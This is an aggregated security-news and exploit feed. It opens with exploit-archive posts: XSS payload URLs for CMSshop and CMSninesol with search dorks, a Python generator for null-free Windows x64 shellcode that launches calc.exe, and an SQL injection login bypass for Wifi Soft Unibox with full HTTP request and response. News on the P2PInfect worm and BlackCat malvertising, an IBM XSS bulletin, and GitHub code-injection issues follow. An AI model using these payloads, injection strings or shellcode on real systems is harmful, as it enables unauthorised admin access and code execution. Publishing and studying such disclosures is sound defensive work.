CMSshop version 1 suffers from a cross site scripting vulnerability.

**CMSshop 1 Cross Site Scripting**

Posted Jul 31, 2023

Authored by indoushka

CMSshop version 1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 987e4a7e0d2984ae1bf6c18eb68c0343d8d4d8903869ab00d311e71710917c70

Download | Favorite | View

**CMSshop 1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : CMSshop(ir) v1 XSS Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://codecanyon.net/item/pro-login-advanced-secure-php-user-management-system/12388905?s_rank=169               || # Dork      : "Login - ProLogin"                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /shop-php/cart.php?new=28%22%20onmouseover%3dprompt(904251)%20bad%3d%22                   /shop-php/product.php?productid=20&start=0%22%20onmouseover%3dprompt(961299)%20bad%3d%22            [+] http://localhost/shop-php/cart.php?new=21%22%20%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E%22Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,806)
*   Arbitrary (16,170)
*   BBS (2,859)
*   Bypass (1,736)
*   CGI (1,026)
*   Code Execution (7,254)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,336)
*   DoS (23,386)
*   Encryption (2,366)
*   Exploit (51,705)
*   File Inclusion (4,218)
*   File Upload (969)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (891)
*   Java (3,038)
*   JavaScript (853)
*   Kernel (6,658)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,587)
*   Python (1,531)
*   Remote (30,698)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,879)
*   Shell (3,177)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,329)
*   TCP (2,399)
*   Trojan (687)
*   UDP (886)
*   Virus (664)
*   Vulnerability (31,731)
*   Web (9,628)
*   Whitepaper (3,748)
*   x86 (962)
*   XSS (17,889)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,301)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,624)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,782)
*   UNIX (9,272)
*   UnixWare (186)
*   Windows (6,566)
*   Other

CMSshop 1 Cross Site Scripting

169 bytes small Windows/x64 PIC NULL-free calc.exec shellcode.

    import ctypes, structfrom keystone import *# Shellcode Author: Senzee# Shellcode Title: Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)# Date: 07/26/2023# Platform: Windows x64# Tested on: Windows 11 Home/Windows Server 2022 Standard/Windows Server 2019 Datacenter# OS Version (respectively): 10.0.22621 /10.0.20348 /10.0.17763# Shellcode size: 169 bytes# Shellcode Desciption: Windows x64 shellcode that dynamically resolves the base address of kernel32.dll via PEB and ExportTable method.# Contains no Null bytes (0x00), and therefor will not crash if injected into typical stack Buffer OverFlow vulnerabilities.CODE = ("find_kernel32:"" xor rdx, rdx;"" mov rax, gs:[rdx+0x60];"    # RAX stores  the value of ProcessEnvironmentBlock member in TEB, which is the PEB address" mov rsi,[rax+0x18];"    # Get the value of the LDR member in PEB, which is the address of the _PEB_LDR_DATA structure" mov rsi,[rsi + 0x20];"    # RSI is the address of the InMemoryOrderModuleList member in the _PEB_LDR_DATA structure" mov r9, [rsi];"    # Current module is python.exe" mov r9, [r9];"    # Current module is ntdll.dll" mov r9, [r9+0x20];"    # Current module is kernel32.dll" jmp call_winexec;""parse_module:" # Parsing DLL file in memory" mov ecx, dword ptr [r9 + 0x3c];" # R9 stores  the base address of the module, get the NT header offset" xor r15, r15;"" mov r15b, 0x88;"    # Offset to Export Directory   " add r15, r9;"" add r15, rcx;"" mov r15d, dword ptr [r15];"    # Get the RVA of the export directory" add r15, r9;"    # R14 stores  the VMA of the export directory" mov ecx, dword ptr [r15 + 0x18];"    # ECX stores  the number of function names as an index value" mov r14d, dword ptr [r15 + 0x20];"    # Get the RVA of ENPT" add r14, r9;"    # R14 stores  the VMA of ENPT"search_function:"    # Search for a given function" jrcxz not_found;"    # If RCX is 0, the given function is not found" dec ecx;"    # Decrease index by 1" xor rsi, rsi;"" mov esi, [r14 + rcx*4];"    # RVA of function name string" add rsi, r9;"    # RSI points to function name string"function_hashing:"    # Hash function name function" xor rax, rax;"" xor rdx, rdx;"" cld;"    # Clear DF flag"iteration:"     # Iterate over each byte" lodsb;"     # Copy the next byte of RSI to Al" test al, al;"     # If reaching the end of the string" jz compare_hash;"     # Compare hash" ror edx, 0x0d;"     # Part of hash algorithm" add edx, eax;"     # Part of hash algorithm" jmp iteration;"     # Next byte"compare_hash:"     # Compare hash" cmp edx, r8d;"" jnz search_function;"     # If not equal, search the previous function (index decreases)" mov r10d, [r15 + 0x24];"     # Ordinal table RVA" add r10, r9;"     # Ordinal table VMA" movzx ecx, word ptr [r10 + 2*rcx];"     # Ordinal value -1" mov r11d, [r15 + 0x1c];"    # RVA of EAT" add r11, r9;"    # VMA of EAT" mov eax, [r11 + 4*rcx];"    # RAX stores  RVA of the function" add rax, r9;"    # RAX stores  VMA of the function" ret;""not_found:"" ret;""call_winexec:""    mov r8d, 0xe8afe98;"     # WinExec Hash"    call parse_module;"     # Search and obtain address of WinExec"    xor rcx, rcx;""    push rcx;"    # \0"    mov rcx, 0x6578652e636c6163;"    # exe.clac "    push rcx;""    lea rcx, [rsp];"    # Address of the string as the 1st argument lpCmdLine"    xor rdx,rdx;""    inc rdx;"    # uCmdShow=1 as the 2nd argument "    sub rsp, 0x28;""    call rax;"     # WinExec)# Payload size: 169 bytes# buf =  b"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x20\x4c\x8b\x0e\x4d"# buf += b"\x8b\x09\x4d\x8b\x49\x20\xeb\x63\x41\x8b\x49\x3c\x4d\x31\xff\x41\xb7\x88\x4d\x01"# buf += b"\xcf\x49\x01\xcf\x45\x8b\x3f\x4d\x01\xcf\x41\x8b\x4f\x18\x45\x8b\x77\x20\x4d\x01"# buf += b"\xce\xe3\x3f\xff\xc9\x48\x31\xf6\x41\x8b\x34\x8e\x4c\x01\xce\x48\x31\xc0\x48\x31"# buf += b"\xd2\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x44\x39\xc2\x75\xda\x45"# buf += b"\x8b\x57\x24\x4d\x01\xca\x41\x0f\xb7\x0c\x4a\x45\x8b\x5f\x1c\x4d\x01\xcb\x41\x8b"# buf += b"\x04\x8b\x4c\x01\xc8\xc3\xc3\x41\xb8\x98\xfe\x8a\x0e\xe8\x92\xff\xff\xff\x48\x31"# buf += b"\xc9\x51\x48\xb9\x63\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x8d\x0c\x24\x48\x31\xd2"# buf += b"\x48\xff\xc2\x48\x83\xec\x28\xff\xd0"ks = Ks(KS_ARCH_X86, KS_MODE_64)encoding, count = ks.asm(CODE)print("%d instructions..." % count)sh = b""for e in encoding:    sh += struct.pack("B", e)shellcode = bytearray(sh)sc = ""print("Payload size: "+str(len(encoding))+" bytes")counter = 0sc = "buf =  b\""for dec in encoding:    if counter % 20 == 0 and counter != 0:        sc += "\"\nbuf += b\""    sc += "\\x{0:02x}".format(int(dec))    counter += 1if count % 20 > 0:  sc += "\""  print(sc)print("Payload size: "+str(len(encoding))+" bytes")

Windows/x64 PIC NULL-Free Calc.exec Shellcode

CMSninesol version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CMSninesol v1.0 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.ninesol.com                                                                                            |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : /download.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/comwaveedupk/download.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMSninesol 1.0 Cross Site Scripting

Wifi Soft Unibox Administration 3.0 and 3.1 is vulnerable to SQL Injection. The vulnerability occurs because of not validating or sanitizing the user input in the username field of the login page.

    # Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"# Date: 07/2023# Exploit Author: Ansh Jain @sudoark# Author  Contact : arkinux01@gmail.com# Vendor Homepage: https://www.wifi-soft.com/# Software Link:https://www.wifi-soft.com/products/unibox-hotspot-controller.php# Version: Unibox Administration 3.0 & 3.1# Tested on: Microsoft Windows 11# CVE : CVE-2023-34635# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable toSQL Injection, which can lead to unauthorised admin access for attackers.The vulnerability occurs because of not validating or sanitising the userinput in the username field of the login page and directly sending theinput to the backend server and database.## How to ReproduceStep 1 : Visit the login page and check the version, whether it is 3.0,3.1, or not.Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field andenter any random password.Step 3 : Fill in the captcha and hit login. After hitting login, you havebeen successfully logged in as an administrator and can see anyone's userdata, modify data, revoke access, etc.--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Login Request-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Parameters: username, password, captcha, action-----------------------------------------------------------------------------------------------------------------------POST /index.php HTTP/2Host: 255.255.255.255.host.comCookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858dUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 83Origin: https://255.255.255.255.host.comReferer: https://255.255.255.255.host.com/index.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersusername='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Login Response--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------HTTP/2 302 FoundServer: nginxDate: Tue, 18 Jul 2023 13:32:14 GMTContent-Type: text/html; charset=UTF-8Location: ./dashboard/dashboardExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Successful Loggedin Request--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------GET /dashboard/dashboard HTTP/2Host: 255.255.255.255.host.comCookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858dUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://255.255.255.255.host.com/index.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailers--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Successful Loggedin Response--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------HTTP/2 200 OKServer: nginxDate: Tue, 18 Jul 2023 13:32:43 GMTContent-Type: text/html; charset=UTF-8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheCache_control: private<!DOCTYPE html><html lang="en">html content</html>

CVE-2023-34635: Wifi Soft Unibox Administration 3.0

The P2PInfect peer-to-peer (P2) worm has been observed employing previously undocumented initial access methods to breach susceptible Redis servers and rope them into a botnet.
"The malware compromises exposed instances of the Redis data store by exploiting the replication feature," Cado Security researchers Nate Bill and Matt Muir said in a report shared with The Hacker News.
"A common attack

The P2PInfect peer-to-peer (P2) worm has been observed employing previously undocumented initial access methods to breach susceptible Redis servers and rope them into a botnet.

"The malware compromises exposed instances of the Redis data store by exploiting the replication feature," Cado Security researchers Nate Bill and Matt Muir said in a report shared with The Hacker News.

"A common attack pattern against Redis in cloud environments is to exploit this feature using a malicious instance to enable replication. This is achieved via connecting to an exposed Redis instance and issuing the SLAVEOF command."

The Rust-based malware was first documented by Palo Alto Networks Unit 42, calling out the malware's ability to exploit a critical Lua sandbox escape vulnerability (CVE-2022-0543, CVSS score: 10.0) to obtain a foothold into Redis instances. The campaign is believed to have commenced on or after June 29, 2023.

However, the latest discovery suggests that the threat actors behind the campaign are leveraging multiple exploits for initial access.

This is not the first time the SLAVEOF command has been abused in the wild. Previously, threat actors associated with malware families such as H2Miner and HeadCrab have abused the attack technique to illicitly mine cryptocurrency on compromised hosts.

In doing so, the goal is to replicate a malicious instance and load a malicious module to activate the infection.

Another initial access vector entails the registration of a malicious cron job on the Redis host to download the malware from a remote server upon execution, a method previously observed in attacks mounted by the WatchDog cryptojacking group.

A successful breach is followed by the distribution of next-stage payloads that allow the malware to alter iptables firewall rules at will, upgrade itself, and potentially deploy cryptocurrency miners at a later date once the botnet has grown to a specific size.

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

"The P2Pinfect malware makes use of a peer-to-peer botnet," the researchers said. "Each infected server is treated as a node, which then connects to other infected servers. This allows the entire botnet to gossip with each other without using a centralized C2 server."

A notable trait of the botnet is its worming behavior, enabling it to expand its reach by using a list of passwords to brute-force SSH servers and attempting to exploit the Lua sandbox escape vulnerability or use the SLAVEOF command in the case of Redis servers.

"P2Pinfect is well-designed and utilizes sophisticated techniques for replication and C2," the researchers concluded. "The choice of using Rust also allows for easier portability of code across platforms (with the Windows and Linux binaries sharing a lot of the same code), while also making static analysis of the code significantly harder."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New P2PInfect Worm Targets Redis Servers with Undocumented Breach Methods

IBM B2B Advanced Communications 1.0.0.0 and IBM Multi-Enterprise Integration Gateway 1.0.0.1 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  IBM X-Force ID:  244076.

**Security Bulletin**

  

**Summary**

IBM B2B Advanced Communications has addressed a cross-site scripting vulnerability.

**Vulnerability Details**

**CVEID:**   CVE-2023-22595  
**DESCRIPTION:**   IBM B2B Advanced Communication is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 5.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/244076 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM B2B Advanced Communications

1.0.0.x

IBM Multi-Enterprise Integration Gateway

1.0.0.1

**Remediation/Fixes**

**Product**

**Version**

**Remediation**

IBM B2B Advanced Communications

1.0.0.x

Apply fix pack 1.0.0.8

IBM Multi-Enterprise Integration Gateway

1.0.0.1

Apply fix pack 1.0.0.8 

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

27 Jul 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSYJCD","label":"IBM Multi-Enterprise Integration Gateway"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"}\],"Version":"1.0.0.6,1.0.0.7,1.0.0.8","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSYJCD","label":"IBM Multi-Enterprise Integration Gateway"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"}\],"Version":"1008","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}}\]

CVE-2023-22595: Security Bulletin: IBM B2B Advanced Communication is vulnerable to cross-site scripting (CVE-2023-22595)

Categories: News
Tags: week

Tags:  security

Tags:  2023

Tags:  July

A list of topics we covered in the week of July 24 to July 30 of 2023



(Read more...)




The post A week in security (July 24 - July 30) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows Antivirus

Mac Antivirus

Android Antivirus

Free Antivirus

VPN App (All Devices)

Malwarebytes for iOS

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (July 24 - July 30)

By Waqas
Happeneing through Google Search, hackers use a malicious ISO archive to distribute files that direct users to fake download pages of popular business applications. 
This is a post from HackRead.com Read the original post: Malvertising Attack Drops BlackCat Ransomware via Fake Search Results

**IN SUMMARY**

*   **The attack lures users into downloading malicious versions of well-known apps through Google Search results**.
*   **These apps include AnyDesk, AnyConnect, WinSCP, Treesize, Cisco, Slack, and more.**
*   **Once a system is infected, attackers install BlackCat ransomware (also known as ALPHV).**

A new malvertising attack has been tracked whose prime target is businesses. According to the latest research report from Bitdefender, threat actors are luring users via advertisements to download malicious versions of popular applications, including AnyDesk, AnyConnect, WinSCP, Treesize, Cisco, Slack, etc.

Fake AnyDesk result on top of actual AnyDesk app on Google (Image cited by Bitdefender – It was originally identified by @mithrandir

Report authors Victor VRABIE and Alexandru MAXIMCIUC explained that in this campaign, hackers rely on DLL sideloading to inject malicious code into the fake versions to gain access to the victim’s computer.

Once invaded, they can perform a wide range of activities on the device, such as stealing credentials, exfiltrating data for extortion, establishing persistence, and installing BlackCat ransomware.

For your information, BlackCat ransomware is distributed by RaaS (ransomware-as-a-service) operators. Also called ALPHV, this ransomware is written in Rust programming language and targets Windows and Linux-based devices.

**The Case of Malicious ISO Archive**

In a blog post, the company wrote that cybercriminals are using a malicious ISO archive with attractive offers to lure business users. Apart from the promised software, a ZIP archive is part of the package. This file contains a Python executable (python.exe) and its dependencies, which launch the malicious code as a Meterpreter stager to let threat actors access the device and achieve their nefarious objectives.

Further probing revealed that the campaign has been active since May 2023, and organizations in North America are the prominent targets, particularly businesses in the US and Canada. So far, Bitdefender researchers have detected six organizations targeted in the US and one in Canada.

**Why are Malvertising Attacks on the Rise?**

Bitdefender researchers highlight that in the past few years, they have observed cybercriminals developing a preference for targeting businesses with malicious versions of commonly used business apps because it is relatively easier to exploit their popularity.

These bogus apps are distributed in ads promoted through malicious websites. First, attackers create fake websites containing malicious downloads for high-interest apps and make sure these sites appear on top of the search engine results through ads. Innocent users click on these ads and get their devices infected when downloading the fake app.

The complete list of indicators of compromise for this malvertising attack is available here (PDF).

**RELATED ARTICLES**

1.  Royal Ransomware Use Google Ads to spread infection
2.  Fake Ads Manager Software Target Facebook Accounts
3.  Google Ads Malware Wipes NFT Influencer’s Crypto Wallet
4.  Fake Facebook Profiles, Google Ads Pushing Sys01 Stealer
5.  Google Ads drop FatalRAT malware from fake browser apps

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Malvertising Attack Drops BlackCat Ransomware via Fake Search Results

FFmpeg 0.7.0 and below was discovered to contain a code injection vulnerability in the component net.bramp.ffmpeg.FFmpeg.<constructor>. This vulnerability is exploited via passing an unchecked argument.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

LetianYuan opened this issue

Jul 20, 2023

· 2 comments

**Comments**

**Affected Version**  
The latest version 0.7.0 and below.

**Describe the vulnerability**  
net.bramp.ffmpeg.FFmpeg.<constructor> is designed to create an FFmpeg object. However, passing an unchecked argument to this API can lead to the execution of arbitrary codes. For instance, following codes can lead to the execution of malicious program:

    new FFmpeg("C:/Windows/System32/calc.exe");
    

**To Reproduce**  
Just execute above codes would reproduce it.

**Fix Suggestion**  
Check the parameter of FFmpeg.<constructor> strictly.

It is by design that a user can provide the path to the binary they wish to call for ffmpeg/avconv

What would you suggest instead? As-in what is a concrete suggestion for more strict checking?

> It is by design that a user can provide the path to the binary they wish to call for ffmpeg/avconv
> 
> What would you suggest instead? As-in what is a concrete suggestion for more strict checking?

Much thanks for your reply. Actually, we've sent a mail months ago to discuss this problem, but we got no reply.

I'll close this issure right now.

2 participants

CVE-2023-39018: There's a code injection vulnerability of `net.bramp.ffmpeg.FFmpeg.<constructor>` · Issue #291 · bramp/ffmpeg-cli-wrapper

webmagic-extension v0.9.0 and below was discovered to contain a code injection vulnerability via the component us.codecraft.webmagic.downloader.PhantomJSDownloader.

**Affected Version**  
The latest version 0.9.0 and below.

**Describe the vulnerability**  
there is a method, us.codecraft.webmagic.downloader.PhantomJSDownloader.download(Request, Task), designed to download a page from a request. However, passing an unchecked argument to PhantomJSDownloader constructor can lead to the execution of arbitrary commands. For instance, on Windows, new PhantomJSDownloader("cmd /c "for /l %i in (1, 1, 10) do calc"", "") would open ten calculators.

    PhantomJSDownloader downloader = new PhantomJSDownloader("cmd /c \"for /l %i in (1, 1, 10) do calc\"", "");
    Request request = new Request();
    downloader.download(request, null);
    

**To Reproduce**  
Just execute above codes would reproduce it.

**Fix Suggestion**  
First, I strongly recommend that you can simply remove PhantomJSDownloader.java and all codes related to it in the project, because PhantomJS is no longer maintained 5 years ago, namely since Mar 4, 2018 (See ariya/phantomjs#15344). Or, you can check parameter phantomJsCommand strictly. For example, you can write codes to check whether phantomJsCommand is a phantomjs executable.

Tag

#windows